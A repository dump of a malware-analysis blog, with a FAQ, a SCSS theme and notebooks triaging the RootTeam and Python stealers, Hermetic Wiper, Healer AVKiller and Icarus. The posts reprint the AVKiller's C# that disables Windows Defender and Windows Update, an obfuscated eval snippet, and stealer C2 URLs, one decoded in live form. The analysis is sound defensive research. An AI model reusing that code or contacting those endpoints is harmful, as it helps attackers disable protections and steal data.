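        print(f"invalid YAML: {e}")  # the unquoted colon triggers "mapping values are not allowed"
```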
63 |
64 | 2. Can you customize the styling or theme of fastpages? **A**: See [Customizing Fastpages](https://github.com/fastai/fastpages#customizing-fastpages)
65 |
66 | 3. Your initial build failed on GH-Pages Status
67 |
68 | `Error message: Unable to build page. Please try again later.` `Error: Process completed with exit code 1.`
69 |
70 | If your GitHub username contains capital letters, e.g. YourUserName, go to the [config file](../_config.yml#L17) line 17 and rename `YourUserName.github.io` to `yourusername.github.io`. After the commit, the blog should build without error.
71 |
72 | See the [FAQ](https://github.com/fastai/fastpages#faq) for frequently asked questions.
73 |
--------------------------------------------------------------------------------
/_notebooks/2023-07-20-rootteam.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "48f69525-d31d-4962-afd4-ec2491c84896",
6 | "metadata": {},
7 | "source": [
8 | "# RootTeam\n",
9 | "> Taking a look at this free GO stealer\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [RootTeam,stealer,triage]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "a143393c-3efe-433e-b6df-e1dd111a8160",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Identified by [@g0njxa](https://twitter.com/g0njxa/status/1675971998529323008), RootTeam is a GO stealer that can be built via a Telegram channel `https[:]//t[.]me/rootteam_bot`. It has been confused with Bandit Stealer another GO stealer with similar functionality. \n",
24 | "\n",
25 | "The sample we are triaging came from @James_inthe_box [twitter post](https://twitter.com/James_inthe_box/status/1678513274856374273?s=20) with a link to the sample on [AnyRun](https://app.any.run/tasks/c3b6937b-5613-4f6c-94a3-e56901d9b2b3/)\n",
26 | "\n",
27 | "\n",
28 | "### References\n",
29 | "\n",
30 | "- [RootTeam Stealer and overlap issues on Bandit Stealer rule detection](https://community.emergingthreats.net/t/rootteam-stealer-and-overlap-issues-on-bandit-stealer-rule-detection/744/1)\n",
31 | "- [Technical Analysis of Bandit Stealer](https://www.zscaler.com/blogs/security-research/technical-analysis-bandit-stealer)\n",
32 | "- [RootTeam builder exposed on twitter](https://twitter.com/suyog41/status/1678683341988540416?s=20)\n",
33 | "- [New Info Stealer Bandit Stealer Targets Browsers, Wallets](https://www.trendmicro.com/en_ca/research/23/e/new-info-stealer-bandit-stealer-targets-browsers-wallets.html)\n",
34 | "- [Yogesh Londhe tweet about the stealer](https://twitter.com/suyog41/status/1674673495106543616)\n",
35 | "- [GO IDA parser (works well!)](https://github.com/0xjiayu/go_parser)\n",
36 | "\n",
37 | "\n",
38 | "### Sample\n",
39 | "\n",
40 | "The sample is being delived via this url `https[:]//telegra[.]ph/Dead-Space-Remake-PC-Download-For-Free-07-07` [AnyRun](https://app.any.run/tasks/c3b6937b-5613-4f6c-94a3-e56901d9b2b3/)\n",
41 | "\n",
42 | "## Delivery\n",
43 | "\n",
44 | "### Stage 1 - Setup.zip\n",
45 | "\n",
46 | "\n",
47 | "The sample poses as free software and is delivered via a password encrypted ZIP file. The password provided is `2023`. To infect themselves the victim must first download the sample then unzip it using the provided password and then launch the unzipped `Setup.exe` file. \n",
48 | "\n",
49 | "- **Setup.zip** `88a44f77d9216b4c285329f5f13bcd948bca61e1b9bb4dafb541cc6ea68ce311`\n",
50 | "- **Setup.exe** `9de0dfcf9baf669811374d2f6ed0a1182df8d0254cd210f6f2883c659014de5a` [Malshare](https://malshare.com/sample.php?action=detail&hash=9de0dfcf9baf669811374d2f6ed0a1182df8d0254cd210f6f2883c659014de5a)\n",
51 | "\n",
52 | "### Stage 2 - Shellcode\n",
53 | "The `Setup.exe` PE file has a resource named `OUTPUT_BIN` that contains shellcode and the encrypted stealer payload. The shellcode has 2 stages. The first is a simple obfuscation function that decrypts the second stage. The second stage is an XOR decryption loop the decrypts the final payload.\n",
54 | "\n",
55 | "### UPX Payload\n",
56 | "The decrypted payload is also UPX packed. Once unpacked the final RootTeam stealer is revealed.\n",
57 | "\n",
58 | "## Analysis\n",
59 | "\n",
60 | "[`e0cd16b3de1f8b6c91b3483e383199f691e935d3d4e1ed9e77f6f9aea929b68b`](https://www.unpac.me/results/cbdc661a-953b-44f7-9e13-0358416a2448)\n",
61 | "\n",
62 | "The stealer method names and strings can be recovered using the IDA GO tool [go_parser](https://github.com/0xjiayu/go_parser). Once recovered the functionally of the stealer can be determined based on the stealer function names prefixed by `RootTeamStl_`. The strings are in plaintext including the C2 URLs.\n",
63 | "\n",
64 | "- `http[:]//5.42.66[.]26/api/report`\n",
65 | "- `http[:]//5.42.66[.]26/upload/`\n"
66 | ]
67 | },
68 | {
69 | "cell_type": "code",
70 | "execution_count": null,
71 | "id": "bbf8b1eb-0377-4620-b10f-3db05953a799",
72 | "metadata": {},
73 | "outputs": [],
74 | "source": []
75 | }
76 | ],
77 | "metadata": {
78 | "kernelspec": {
79 | "display_name": "Python 3",
80 | "language": "python",
81 | "name": "python3"
82 | },
83 | "language_info": {
84 | "codemirror_mode": {
85 | "name": "ipython",
86 | "version": 3
87 | },
88 | "file_extension": ".py",
89 | "mimetype": "text/x-python",
90 | "name": "python",
91 | "nbconvert_exporter": "python",
92 | "pygments_lexer": "ipython3",
93 | "version": "3.9.5"
94 | }
95 | },
96 | "nbformat": 4,
97 | "nbformat_minor": 5
98 | }
99 |
--------------------------------------------------------------------------------
/_sass/minima/fastpages-dracula-highlight.scss:
--------------------------------------------------------------------------------
1 | // Override Syntax Highlighting In Minima With the Dracula Theme: https://draculatheme.com/
2 | // If you wish to override any of this CSS, do so in _sass/minima/custom-styles.css
3 |
4 | $dt-gray-dark: #282a36; // Background
5 | $dt-code-cell-background: #323443;
6 | $dt-gray: #44475a; // Current Line & Selection
7 | $dt-gray-light: #f8f8f2; // Foreground
8 | $dt-blue: #6272a4; // Comment
9 | $dt-cyan: #8be9fd;
10 | $dt-green: #50fa7b;
11 | $dt-orange: #ffb86c;
12 | $dt-pink: #ff79c6;
13 | $dt-purple: #bd93f9;
14 | $dt-red: #ff5555;
15 | $dt-yellow: #f1fa8c;
16 | $dt-green-light: rgb(172, 229, 145);
17 |
18 | .language-python + .language-plaintext {
19 | border-left: 1px solid grey;
20 | margin-left: 1rem !important;
21 | }
22 |
23 | // ensure dark background for code in markdown
24 | [class^="language-"]:not(.language-plaintext) pre,
25 | [class^="language-"]:not(.language-plaintext) code {
26 | background-color: $dt-code-cell-background !important;
27 | color: $dt-gray-light;
28 | }
29 |
30 | .language-python + .language-plaintext code { background-color: white !important; }
31 | .language-python + .language-plaintext pre { background-color: white !important; }
32 |
33 | // for Jupyter Notebook HTML Code Cells modified from https://www.fast.ai/public/css/hyde.css
34 |
35 | .input_area pre, .input_area div {
36 | margin-bottom:1.0rem !important;
37 | margin-top:1.5rem !important;
38 | padding-bottom:0 !important;
39 | padding-top:0 !important;
40 | background: #323443 !important;
41 | -webkit-font-smoothing: antialiased;
42 | text-rendering: optimizeLegibility;
43 | font-family: Menlo, Monaco, Consolas, "Lucida Console", Roboto, Ubuntu, monospace;
44 | border-radius: 5px;
45 | font-size: 105%;
46 | }
47 | .output_area pre, .output_area div {
48 | margin-bottom:1rem !important;
49 | margin-top:0rem !important;
50 | padding-bottom:0 !important;
51 | padding-top:0 !important;
52 | }
53 | .input_area pre {
54 | border-left: 1px solid lightcoral;
55 | }
56 | .output_area pre {
57 | border-left: 1px solid grey;
58 | margin-left: 1rem !important;
59 | font-size: 16px;
60 | }
61 |
62 | .code_cell table { width: auto; }
63 |
64 | /* Dracula Theme v1.2.5
65 | *
66 | * https://github.com/zenorocha/dracula-theme
67 | *
68 | * Copyright 2016, All rights reserved
69 | *
70 | * Code licensed under the MIT license
71 | *
72 | */
73 |
74 | .highlight {
75 | background: $dt-code-cell-background !important;
76 | color: $dt-gray-light !important;
77 | pre, code {
78 | background: $dt-code-cell-background;
79 | color: $dt-gray-light;
80 | font-size: 110%;
81 | }
82 |
83 | .hll,
84 | .s,
85 | .sa,
86 | .sb,
87 | .sc,
88 | .dl,
89 | .sd,
90 | .s2,
91 | .se,
92 | .sh,
93 | .si,
94 | .sx,
95 | .sr,
96 | .s1,
97 | .ss {
98 | color:rgb(231, 153, 122);
99 | }
100 |
101 | .go {
102 | color: $dt-gray;
103 | }
104 |
105 | .err,
106 | .g,
107 | .l,
108 | .n,
109 | .x,
110 | .ge,
111 | .gr,
112 | .gh,
113 | .gi,
114 | .gp,
115 | .gs,
116 | .gu,
117 | .gt,
118 | .ld,
119 | .no,
120 | .nd,
121 | .pi,
122 | .ni,
123 | .ne,
124 | .nn,
125 | .nx,
126 | .py,
127 | .w,
128 | .bp {
129 | color: $dt-gray-light;
130 | background-color: $dt-code-cell-background !important;
131 | }
132 |
133 | .p {
134 | font-weight: bold;
135 | color: rgb(102, 217, 239);
136 | }
137 |
138 | .ge {
139 | text-decoration: underline;
140 | }
141 |
142 | .bp {
143 | font-style: italic;
144 | }
145 |
146 | .c,
147 | .ch,
148 | .cm,
149 | .cpf,
150 | .cs {
151 | color: $dt-blue;
152 | }
153 |
154 | .c1 {
155 | color: gray;
156 | }
157 |
158 | .kd,
159 | .kt,
160 | .nb,
161 | .nl,
162 | .nv,
163 | .vc,
164 | .vg,
165 | .vi,
166 | .vm {
167 | color: $dt-cyan;
168 | }
169 |
170 | .kd,
171 | .nb,
172 | .nl,
173 | .nv,
174 | .vc,
175 | .vg,
176 | .vi,
177 | .vm {
178 | font-style: italic;
179 | }
180 |
181 | .fm,
182 | .na,
183 | .nc,
184 | .nf
185 | {
186 | color: $dt-green-light;
187 | }
188 |
189 | .k,
190 | .o,
191 | .cp,
192 | .kc,
193 | .kn,
194 | .kp,
195 | .kr,
196 | .nt,
197 | .ow {
198 | color: $dt-pink;
199 | }
200 |
201 | .kc {
202 | color: $dt-green-light;
203 | }
204 |
205 | .m,
206 | .mb,
207 | .mf,
208 | .mh,
209 | .mi,
210 | .mo,
211 | .il {
212 | color: $dt-purple;
213 | }
214 |
215 | .gd {
216 | color: $dt-red;
217 | }
218 | }
219 |
220 | p code{
221 | font-size: 19px;
222 | }
223 |
--------------------------------------------------------------------------------
/_notebooks/2024-08-26-python-hunting.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "53ed2cff-3881-41d1-9985-2b40bfd4e4de",
6 | "metadata": {},
7 | "source": [
8 | "# Python Hunting\n",
9 | "> Triaging this unknown python stealer with some breakpoints\n",
10 | "- toc: true \n",
11 | "- badges: true\n",
12 | "- categories: [python,triage,x64dbg]"
13 | ]
14 | },
15 | {
16 | "cell_type": "markdown",
17 | "id": "ad232a20-5fad-4d03-8cf9-0570891b2de0",
18 | "metadata": {},
19 | "source": [
20 | "## Overview\n",
21 | "\n",
22 | "We are going to be analyzing an unknown python stealer that comes bundled as a pyinstaller. Initially we took the standard static approach of extracting and decompiling the python code but the decompiler did not fully work (python version 3.11) and the python code was heavily obfuscated. Normally we would use a trick of replacing `eval` and `exec` with `print` statements in the python runtime as a way to simply deobfuscate the script but the fact that it was not correctly decompiled makes this difficult. Instead we are going to approach it dynamically.\n",
23 | "\n",
24 | "### References\n",
25 | "\n",
26 | "- PyInstaller Extractor [link](https://github.com/pyinstxtractor/pyinstxtractor-ng) \n",
27 | "- Python Decompiler [pylingual](https://pylingual.io/)\n",
28 | "- Nice githug search interface [grep.app](https://grep.app/)\n",
29 | "\n",
30 | "### Sample\n",
31 | "`2a19ba63e85ce75d5f2d884011dfc94f616b176ed89a67c1acc0fe2179e8b591` [UnpacMe](https://www.unpac.me/results/c26745bc-501a-45dc-832a-a1c0ed6ab086)"
32 | ]
33 | },
34 | {
35 | "cell_type": "markdown",
36 | "id": "c4beff41-8fd5-4afb-9909-e940a0977d1f",
37 | "metadata": {},
38 | "source": [
39 | "## Analysis\n",
40 | "\n",
41 | "- First extracting the pyinstaller we can see that the main python file is called `mPSCzi.pyc` and the bundled python dll is python 3.11\n",
42 | "- Decompiling with pylingual show us the obfuscated code (snip below)\n",
43 | "\n",
44 | "```python\n",
45 | "strpjab = tvnboaswivayssk - sjeqavagljouxg\n",
46 | "tzvzwyilyuilob = fmikzvuexqgiygyrsw - laswhphcwhrgd\n",
47 | "nvpvfxkszm = tvxzshhdfwer * tvnboaswivayssk\n",
48 | "mxszwtywur = stzhmggz - mguyywdexiw\n",
49 | "eval(bmurybzixs('d3NqcmN3Z3JweGlrYXp6biArIGpsc2h6cmlndCArIG92Z2hjZ3JpZ2JicCArIHh3Y3l1d3hmdnRlICsgZnl5bGp4eGV0ICsgYWZtanVwb2V3ICsgamZ5cG5mciArIGxhc3docGhjd2hyZ2QgKyBwZ3Z0YWp4ZWl5YWxyZyArIHN0emhtZ2d6ICsgc2plcWF2YWdsam91eGcgKyB0dnh6c2hoZGZ3ZXIgKyBnZXZzem9lcHpmd3B4YSArIG5saWxkdWliYnpuICsgbndiaHFobWZlcmZ6ZnV1ICsgdnV4Y2h5a3RuICsgenJvdXRndmdoY2FxbXJzYXUgKyB0dm5ib2Fzd2l2YXlzc2sgKyBmbWlrenZ1ZXhxZ2l5Z3lyc3cgKyB3d2l0ZG55ZyArIG1ndXl5d2RleGl3').decode())\n",
50 | "```\n",
51 | "\n",
52 | "### Dynamic Analysis\n",
53 | "Our dynamic approach will be to directly load the compiled script using the regular python interpreter instead of the pysintaller binary. This will allow us to load symbols for the python dll and attach to it with a debugger. Using the debugger we will break on the function `PyParser_ASTFromString` which is the internal method used for dynamically compiling python called by `eval` and `exec`.\n",
54 | "\n",
55 | "- Dumping the strings from the python 3.11 dll we can see the specific version is 3.11.9\n",
56 | "- We need the install the exact version so that we can run the compiled `mPSCzi.pyc` file\n",
57 | "- We can then add a break point on `PyParser_ASTFromString` and add a log command in the breakpoint to log the first argument (the python code) `{s:utf8(rcx, A00000)}` \n",
58 | "- With this we can then see all of the evaled code is then dumped into the log\n",
59 | "\n",
60 | "The dumped code can be found here [pastebin](https://pastebin.com/6Bki1aRC)\n"
61 | ]
62 | },
63 | {
64 | "cell_type": "markdown",
65 | "id": "099e1532-8816-4a9e-9b93-61a04aec247f",
66 | "metadata": {},
67 | "source": [
68 | "### Final Stage C2s\n",
69 | "The final stage is also obfuscated but parts of the code can be run to deobfuscate it dynamically. "
70 | ]
71 | },
72 | {
73 | "cell_type": "code",
74 | "execution_count": 3,
75 | "id": "5b1f3f72-3c99-45e7-b308-98861a82cd87",
76 | "metadata": {},
77 | "outputs": [
78 | {
79 | "name": "stdout",
80 | "output_type": "stream",
81 | "text": [
82 | "https://mgststudio.shop/sunrise\n",
83 | "https://mgststudio.shop/luminous\n"
84 | ]
85 | }
86 | ],
87 | "source": [
88 | "\n",
89 | "import base64\n",
90 | "\n",
91 | "ZWHmjDkfVvkVdclV = 'bWdzdHN0dWRpby5zaG9w'\n",
92 | "RYBTeAeZbiUOxeloi = base64.b64decode(ZWHmjDkfVvkVdclV).decode()\n",
93 | "\n",
94 | "print(f'https://{RYBTeAeZbiUOxeloi}/sunrise')\n",
95 | "print(f'https://{RYBTeAeZbiUOxeloi}/luminous')"
96 | ]
97 | },
98 | {
99 | "cell_type": "code",
100 | "execution_count": null,
101 | "id": "4f90197f-920b-4dd3-a8e5-72cbfbefddae",
102 | "metadata": {},
103 | "outputs": [],
104 | "source": []
105 | }
106 | ],
107 | "metadata": {
108 | "kernelspec": {
109 | "display_name": "Python 3",
110 | "language": "python",
111 | "name": "python3"
112 | },
113 | "language_info": {
114 | "codemirror_mode": {
115 | "name": "ipython",
116 | "version": 3
117 | },
118 | "file_extension": ".py",
119 | "mimetype": "text/x-python",
120 | "name": "python",
121 | "nbconvert_exporter": "python",
122 | "pygments_lexer": "ipython3",
123 | "version": "3.9.5"
124 | }
125 | },
126 | "nbformat": 4,
127 | "nbformat_minor": 5
128 | }
129 |
--------------------------------------------------------------------------------
/_notebooks/2022-02-27-hermetic_wiper.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "09f4393e-183a-4705-843a-729401a0f1c9",
6 | "metadata": {},
7 | "source": [
8 | "# Hermetic Wiper Malware\n",
9 | "> Analysis of the wiper malware using in the Ukrainian cyber attacks\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [hermetic,hermetic wiper,wiper,malware,APT]"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "03750185-dad2-47ce-bd7f-2aca039b3ce7",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "Sample: `1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591`\n",
24 | "\n",
25 | "\n",
26 | "Sample 2: `0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da`\n",
27 | "\n",
28 | "\n",
29 | "## References\n",
30 | "- [Sample on Malshare](https://malshare.com/sample.php?action=detail&hash=1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591)\n",
31 | "- [J. A. Guerrero-Saade Twitter Thread](https://twitter.com/juanandres_gs/status/1496581710368358400?s=20&t=tuoQe510ow0HmQNbEXQimQ)\n",
32 | "- [ESET Twitter Thread](https://twitter.com/ESETresearch/status/1496581903205511181?s=20&t=tuoQe510ow0HmQNbEXQimQ)\n",
33 | "- [CrowdStrike Blog](https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/)\n",
34 | "- [SentinalOne Blog](https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/)\n",
35 | "\n",
36 | "## Backstory\n",
37 | "- Wiper binary is signed using a code signing certificate issued to Wiper binary is signed using a code signing certificate issued to **Hermetica Digital Ltd** \n",
38 | "- Wiper abuses legitimate drivers from the **EaseUS Partition Master**\n",
39 | "- Modifying CrashControl regkey, [CrashDumpEnabled](https://docs.microsoft.com/en-us/windows/client-management/system-failure-recovery-options#under-write-debugging-information) key to 0\n",
40 | "- Enumerating PhysicalDrives up to 100 - can you even have 100 drives??\n",
41 | "\n",
42 | "\n",
43 | "## Abused Legit Drivers\n",
44 | "The following legit drivers are stored in the resources section of the PE. They are compressed.\n",
45 | "- RCDATA_DRV_X64 (mscompress) e5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5\n",
46 | "- RCDATA_DRV_X86 (mscompress) b01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1\n",
47 | "- RCDATA_DRV_XP_X64 (mscompress) b6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd\n",
48 | "- RCDATA_DRV_XP_X86 (mscompress) fd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d\n"
49 | ]
50 | },
51 | {
52 | "cell_type": "markdown",
53 | "id": "7158910a-c7be-4517-83a0-8b0c9fc1d588",
54 | "metadata": {},
55 | "source": [
56 | "## Reversing Notes\n",
57 | "\n",
58 | "Arg1 is a sleep before reboot (in minutes)\n",
59 | "Arg2 is sleep before ??? (minutes minus the arg1 sleep)\n",
60 | "\n",
61 | "Grants itself `SeBackupPrivilege`, and `SeShutdownPrivilege`. [Note](https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/privileges), `SeBackupPrivilege` allows file content retrieval, even if the security descriptor on the file might not grant such access. \n",
62 | "\n",
63 | "\n",
64 | "If the host is Windows Vista and above they use one set of drivers (64/32bit). For XP they use a different set of drivers (32/64bit).\n",
65 | "\n",
66 | "Dissable crashdump using reg key `SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl\\\\CrashDumpEnabled`\n",
67 | "\n",
68 | "Possible driver communication via named pipe `\\\\.\\EPMNTDRV\\0`\n",
69 | "\n",
70 | "Write the driver from resource to `\\??\\c:\\Windows\\system32\\Drivers` as an mscompress file. Then copy and decompress it to another file with the same name and a `.sys` file extension. Then grant `SeLoadDriverPrivilege` priviledges to self and load driver.\n",
71 | "\n",
72 | "\n"
73 | ]
74 | },
75 | {
76 | "cell_type": "code",
77 | "execution_count": 3,
78 | "id": "9e0c7b94-4bd3-4410-8261-aa47b6168b09",
79 | "metadata": {},
80 | "outputs": [
81 | {
82 | "name": "stdout",
83 | "output_type": "stream",
84 | "text": [
85 | "DWORD d0;\n",
86 | "DWORD d4;\n",
87 | "DWORD d8;\n",
88 | "DWORD d12;\n",
89 | "DWORD d16;\n",
90 | "DWORD d20;\n",
91 | "DWORD d24;\n",
92 | "DWORD d28;\n",
93 | "DWORD d32;\n",
94 | "DWORD d36;\n",
95 | "DWORD d40;\n"
96 | ]
97 | }
98 | ],
99 | "source": [
100 | "for i in range(0,41,4):\n",
101 | " print(f\"DWORD d{i};\")"
102 | ]
103 | },
104 | {
105 | "cell_type": "markdown",
106 | "id": "b7f621fc-5987-4c1f-9c40-03fda696c3a0",
107 | "metadata": {},
108 | "source": [
109 | "\n",
110 | "\n"
111 | ]
112 | },
113 | {
114 | "cell_type": "code",
115 | "execution_count": null,
116 | "id": "d13df182-c0ab-42ac-a231-09e0f4ed376f",
117 | "metadata": {},
118 | "outputs": [],
119 | "source": []
120 | }
121 | ],
122 | "metadata": {
123 | "kernelspec": {
124 | "display_name": "Python 3",
125 | "language": "python",
126 | "name": "python3"
127 | },
128 | "language_info": {
129 | "codemirror_mode": {
130 | "name": "ipython",
131 | "version": 3
132 | },
133 | "file_extension": ".py",
134 | "mimetype": "text/x-python",
135 | "name": "python",
136 | "nbconvert_exporter": "python",
137 | "pygments_lexer": "ipython3",
138 | "version": "3.9.5"
139 | }
140 | },
141 | "nbformat": 4,
142 | "nbformat_minor": 5
143 | }
144 |
--------------------------------------------------------------------------------
/_notebooks/2023-03-15-healer-avkiller.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "8dae9330-7737-4619-ab01-aae0df9a38d4",
6 | "metadata": {},
7 | "source": [
8 | "# Healer AVKiller\n",
9 | "> Simple .NET hack tool used to kill AV\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [healer,avkiller,dotnet,TrustedInstaller]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "800466b9-894c-4b15-8c37-001673a43cdc",
19 | "metadata": {},
20 | "source": [
21 | "## Overview\n",
22 | "\n",
23 | "This small .NET hacking tool is often deployed along side Redline Stealer and is used to disable antivirus.\n",
24 | "\n",
25 | "## Samples\n",
26 | "\n",
27 | "- 976ba54ff3f8ab4c1d6fe5629460b1fc42106495ddb3151b52951030069b6d47 [UnpacMe Analysis](https://www.unpac.me/results/919f2d1b-4622-4070-b634-adffffa4daf8?hash=976ba54ff3f8ab4c1d6fe5629460b1fc42106495ddb3151b52951030069b6d47)\n",
28 | "- 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 [UnpacMe Analysis](https://www.unpac.me/results/2950bddb-dba3-45a5-b00a-ed7e74c42495?hash=850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38)\n",
29 | "- a4f91172441b827b1e0cc6d7fb58d904fb5dd3bca64f08be24c431db2fdcca6d [UnpacMe Analysis](https://www.unpac.me/results/99280669-8c9b-40d4-be2c-f088990dbd3b?hash=a4f91172441b827b1e0cc6d7fb58d904fb5dd3bca64f08be24c431db2fdcca6d)\n",
30 | "\n"
31 | ]
32 | },
33 | {
34 | "cell_type": "markdown",
35 | "id": "f4023a69-19ba-472d-bacb-a3ef3d857b60",
36 | "metadata": {},
37 | "source": [
38 | "## Analysis\n",
39 | "\n",
40 | "When launched the binary first elevates to SYSTEM using token impersonation with the `winlogon` token, then it migrates to `TrustedInstaller` using the `TrustedInstaller` service token. \n",
41 | "With `TrustedInstaller` permissions it gains full access to the protected registry keys and services such as those used by Windows Defender. This is a well documented elevation tactic that is decribed in the 2017 blog post [The Art of Becoming TrustedInstaller](https://www.tiraniddo.dev/2017/08/the-art-of-becoming-trustedinstaller.html).\n",
42 | "\n",
43 | "\n",
44 | "### Windows Defender Targets\n",
45 | "The following registry keys and services are dissabled.\n",
46 | "\n",
47 | "```c#\n",
48 | "Program.DisableService(\"WinDefend\");\n",
49 | "Program.RegistryEdit(\"SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Features\", \"TamperProtection\", \"0\");\n",
50 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\", \"DisableAntiSpyware\", \"1\");\n",
51 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableBehaviorMonitoring\", \"1\");\n",
52 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableIOAVProtection\", \"1\");\n",
53 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableOnAccessProtection\", \"1\");\n",
54 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableRealtimeMonitoring\", \"1\");\n",
55 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\", \"DisableScanOnRealtimeEnable\", \"1\");\n",
56 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\Notifications\", \"DisableNotifications\", \"1\");\n",
57 | "Program.DisableService(\"wuauserv\");\n",
58 | "Program.DisableService(\"WaaSMedicSvc\");\n",
59 | "Program.DisableService(\"UsoSvc\");\n",
60 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"AUOptions\", \"2\");\n",
61 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"AutoInstallMinorUpdates\", \"0\");\n",
62 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"NoAutoUpdate\", \"1\");\n",
63 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"NoAutoRebootWithLoggedOnUsers\", \"1\");\n",
64 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\AU\", \"UseWUServer\", \"1\");\n",
65 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"DoNotConnectToWindowsUpdateInternetLocations\", \"1\");\n",
66 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"WUStatusServer\", \"server.wsus\");\n",
67 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"WUServer\", \"server.wsus\");\n",
68 | "Program.RegistryEdit(\"SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\", \"UpdateServiceUrlAlternate\", \"server.wsus\");\n",
69 | "```\n"
70 | ]
71 | },
72 | {
73 | "cell_type": "code",
74 | "execution_count": null,
75 | "id": "948b4457-f10c-4638-9d1a-e57743e1b4af",
76 | "metadata": {},
77 | "outputs": [],
78 | "source": []
79 | }
80 | ],
81 | "metadata": {
82 | "kernelspec": {
83 | "display_name": "Python 3",
84 | "language": "python",
85 | "name": "python3"
86 | },
87 | "language_info": {
88 | "codemirror_mode": {
89 | "name": "ipython",
90 | "version": 3
91 | },
92 | "file_extension": ".py",
93 | "mimetype": "text/x-python",
94 | "name": "python",
95 | "nbconvert_exporter": "python",
96 | "pygments_lexer": "ipython3",
97 | "version": "3.9.5"
98 | }
99 | },
100 | "nbformat": 4,
101 | "nbformat_minor": 5
102 | }
103 |
--------------------------------------------------------------------------------
/_notebooks/2022-10-09-icarus.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "markdown",
5 | "id": "864a2be1-5cb7-4a72-91e4-286c9b9180c5",
6 | "metadata": {},
7 | "source": [
8 | "# Icarus Stealer - What is it?\n",
9 | "> What is this malware and how does it work\n",
10 | "\n",
11 | "- toc: true \n",
12 | "- badges: true\n",
13 | "- categories: [icarus,yara,config,dotnet]\n"
14 | ]
15 | },
16 | {
17 | "cell_type": "markdown",
18 | "id": "d021f6a6-cb0f-4533-bfcf-3d64a1da8b64",
19 | "metadata": {},
20 | "source": [
21 | ""
22 | ]
23 | },
24 | {
25 | "cell_type": "markdown",
26 | "id": "e7f5580f-94bf-4035-ab1f-31e22507e03c",
27 | "metadata": {},
28 | "source": [
29 | "## Overview\n",
30 | "\n",
31 | "### Samples\n",
32 | "`8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427` [Malware Bazaar](https://bazaar.abuse.ch/sample/8e88de63c132f964891dd00501bee5078f27dfcec7ca122f19bd43f9ed933427/)\n",
33 | "\n",
34 | "### References\n",
35 | "- Malware Sellix [link](https://icarusdevelopment.sellix.io/terms)\n",
36 | "- Karsten twitter [ref](https://twitter.com/struppigel/status/1566685309093511170)\n",
37 | "- They have a tutorial video! [video](https://vimeo.com/730741460?embedded=true&source=vimeo_logo&owner=176036178)\n",
38 | "\n",
39 | "## Analysis"
40 | ]
41 | },
42 | {
43 | "cell_type": "markdown",
44 | "id": "972908c7-cc26-401b-b964-28b51449a082",
